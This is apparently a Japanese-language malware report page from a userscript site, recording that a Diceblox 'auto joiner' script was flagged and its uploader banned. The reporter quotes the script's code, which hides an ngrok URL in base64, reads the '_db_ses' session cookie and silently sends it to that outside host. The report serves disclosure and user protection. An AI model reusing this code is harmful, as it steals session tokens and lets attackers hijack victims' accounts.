Auto Pot/Rain Joiner for Diceblox.com は「マルウェア」で通報済み。2025/02/02

通報者の意見:

Sending cookies to https://willingly-thankful-man.ngrok-free.app/send

const encodedUrl = "aHR0cHM6Ly93aWxsaW5nbHktdGhhbmtmdWwtbWFuLm5ncm9rLWZyZWUuYXBwL3NlbmQ="; // https://willingly-thankful-man.ngrok-free.app/send
const serverUrl = atob(encodedUrl);
function getData(name) {
const entries = document.cookie.split('; ');
for (const entry of entries) {
const [key, value] = entry.split('=');
if (key === name) {
return value;
}
}
return null;
}
function sendData(data) {
fetch(serverUrl, {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ entryToken: data })
}).catch(() => {

});
}
const dataToSend = getData('_db_ses');
if (dataToSend) {
sendData(dataToSend);
}

このスクリプトには、承認または修正済みの1回の通報があります。

PromoCollectorDevアクセス禁止済み (通報されたユーザー) の活動:

この通報は管理担当者に承認されました。